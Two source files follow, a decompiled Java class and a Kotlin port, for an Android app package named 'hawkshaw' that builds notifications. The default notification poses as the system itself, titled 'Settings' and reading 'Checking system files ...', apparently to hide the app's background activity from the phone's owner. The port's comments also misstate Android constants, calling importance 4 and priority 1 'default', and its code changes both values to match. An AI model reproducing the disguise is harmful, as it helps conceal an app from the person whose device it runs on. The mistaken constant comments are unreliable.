File: Dummy/hawkshaw/library/utils/NotificationKt.java
package com.hawkshaw.library.utils;

import Y1.K;
import android.app.NotificationChannel;
import android.app.NotificationManager;
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import androidx.core.app.NotificationCompat;
import com.hawkshaw.library.App;
import com.hawkshaw.library.R;

public final class NotificationKt {
    private static final String CHANNEL_ID = "NOTIFICATION_CHANNEL_ID";

    private static final void createNotificationChannel(Context context) {
        NotificationChannel notificationChannel = new NotificationChannel(CHANNEL_ID, "Settings", 4);
        notificationChannel.setDescription("Settings is core part of android");
        ((NotificationManager) context.getSystemService(NotificationManager.class)).createNotificationChannel(notificationChannel);
    }

    public static final NotificationCompat.Builder getNotification(String str, String str2, Intent intent, Context context) {
        K.n(str, "title");
        K.n(str2, "contentText");
        K.n(intent, "intent");
        K.n(context, "context");
        createNotificationChannel(context);
        NotificationCompat.Builder contentIntent = new NotificationCompat.Builder(context, CHANNEL_ID).setContentTitle(str).setContentText(str2).setSmallIcon(R.drawable.ic_media_record).setWhen(System.currentTimeMillis()).setTicker("...").setPriority(1).setContentIntent(PendingIntent.getActivity(context, 75, intent, 134217728));
        K.m(contentIntent, "setContentIntent(...)");
        return contentIntent;
    }

    public static /* synthetic */ NotificationCompat.Builder getNotification$default(String str, String str2, Intent intent, Context context, int i5, Object obj) {
        if ((i5 & 1) != 0) {
            str = "Settings";
        }
        if ((i5 & 2) != 0) {
            str2 = "Checking system files ...";
        }
        if ((i5 & 4) != 0) {
            intent = new Intent("android.settings.SETTINGS");
        }
        if ((i5 & 8) != 0) {
            context = App.Companion.getContext();
        }
        return getNotification(str, str2, intent, context);
    }
}

File: app/src/main/java/com/hawkshaw/library/utils/NotificationKt.kt
package com.hawkshaw.library.utils

import android.app.NotificationChannel
import android.app.NotificationManager
import android.app.PendingIntent
import android.content.Context
import android.content.Intent
import android.os.Build
import androidx.core.app.NotificationCompat
import com.hawkshaw.library.App
import com.hawkshaw.app.R
import android.util.Log // Added for logging

/**
 * Utility functions for handling notifications
 */
object NotificationKt {
    private const val TAG = "NotificationKtUtils" // Added for logging
    private const val CHANNEL_ID = "NOTIFICATION_CHANNEL_ID" // Changed to match Java version

    private fun createNotificationChannel(context: Context) {
        Log.d(TAG, "[DEBUG] createNotificationChannel called. Context: $context, CHANNEL_ID: \"$CHANNEL_ID\"")
        // NotificationChannel is available from API 26 (Oreo)
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            Log.d(TAG, "[DEBUG] createNotificationChannel: SDK_INT >= O. Creating NotificationChannel.")
            val channelName = "Settings" // Changed to match Java version
            val channelDescription = "Settings is core part of android" // Changed to match Java version
            val importance = NotificationManager.IMPORTANCE_DEFAULT // 4 is IMPORTANCE_DEFAULT
            Log.d(TAG, "[DEBUG] createNotificationChannel: Name: \"$channelName\", Importance: $importance, Description: \"$channelDescription\"")

            val notificationChannel = NotificationChannel(
                CHANNEL_ID,
                channelName,
                importance
            )
            notificationChannel.description = channelDescription
            
            val notificationManager = context.getSystemService(NotificationManager::class.java) as NotificationManager
            Log.d(TAG, "[DEBUG] createNotificationChannel: NotificationManager instance: $notificationManager")
            notificationManager.createNotificationChannel(notificationChannel)
            Log.d(TAG, "[DEBUG] createNotificationChannel: createNotificationChannel on manager called.")
        } else {
            Log.d(TAG, "[DEBUG] createNotificationChannel: SDK_INT < O. NotificationChannel not required.")
        }
    }

    @JvmStatic // Keep JvmStatic if you need static access from Java
    @JvmOverloads // This annotation generates overloads for default parameters for Java compatibility
    fun getNotification(
        title: String = "Settings", // Default value from Java's synthetic method
        contentText: String = "Checking system files ...", // Default value from Java's synthetic method
        intent: Intent = Intent("android.settings.SETTINGS"), // Default value from Java's synthetic method
        context: Context = App.getContext() // Default value from Java's synthetic method
    ): NotificationCompat.Builder {
        Log.d(TAG, "[DEBUG] getNotification called. Title: \"$title\", ContentText: \"$contentText\", Intent: $intent, Context: $context")

        Log.d(TAG, "[DEBUG] getNotification: Calling createNotificationChannel.")
        createNotificationChannel(context)
        Log.d(TAG, "[DEBUG] getNotification: createNotificationChannel completed.")

        val requestCode = 75 // Matching Java's request code
        val flags = PendingIntent.FLAG_UPDATE_CURRENT or PendingIntent.FLAG_IMMUTABLE // Added FLAG_IMMUTABLE
        Log.d(TAG, "[DEBUG] getNotification: Creating PendingIntent (Activity). RequestCode: $requestCode, Flags: $flags")
        val pendingIntent = PendingIntent.getActivity(
            context,
            requestCode,
            intent,
            flags
        )
        Log.d(TAG, "[DEBUG] getNotification: PendingIntent created: $pendingIntent")

        Log.d(TAG, "[DEBUG] getNotification: Building NotificationCompat.Builder.")
        val contentIntentBuilder = NotificationCompat.Builder(context, CHANNEL_ID)
            .setContentTitle(title)
            .setContentText(contentText)
            .setSmallIcon(R.drawable.ic_media_record) // Changed to match Java version
            .setWhen(System.currentTimeMillis()) // Added from Java version
            .setTicker("...") // Added from Java version
            .setPriority(NotificationCompat.PRIORITY_DEFAULT) // 1 is PRIORITY_DEFAULT
            .setContentIntent(pendingIntent)
        Log.d(TAG, "[DEBUG] getNotification: NotificationCompat.Builder created: $contentIntentBuilder")

        return contentIntentBuilder
    }
}